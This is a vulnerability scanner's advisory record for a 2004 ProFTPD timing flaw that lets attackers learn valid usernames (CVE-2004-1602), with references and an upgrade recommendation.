| VID |
16084 |
| Severity |
20 |
| Port |
21 |
| Protocol |
TCP |
| Class |
FTP |
| Detailed Description |
The ProFTPD, according to its banner, allows a remote attacker to obtain valid accounts.
ProFTPD is an open-source FTP server software for Unix-based operating systems. ProFTPD versions 1.2.8 and 1.2.10 and possibly other versions, allow a remote attacker to determine valid user account, caused by difference in the amount of time required to process valid usernames versus invalid usernames. By measuring the elapsed time between the sending of the 'USER' command to the server and the servers response, a remote attacker could obtain valid accounts.
* Note: This check solely relied on the banner of the remote ProFTPD server to assess this vulnerability, so this might be a false positive.
* References:
http://www.osvdb.org/displayvuln.php?osvdb_id=10758
http://securitytracker.com/alerts/2004/Oct/1011687.html
* Platforms Affected:
ProFTPD Project, ProFTPD 1.2.10
ProFTPD Project, ProFTPD 1.2.8
ProFTPD Project, ProFTPD possible other versions
Linux Any version
Unix Any version |
| Recommendation |
No upgrade or patch available as of October 2004.
Upgrade to the new version of ProFTPD, when new version fixed this problem becomes available from the ProFTPD Web site at http://www.proftpd.org/ |
| Related URL |
CVE-2004-1602 (CVE) |
| Related URL |
11430 (SecurityFocus) |
| Related URL |
17724 (ISS) |
|
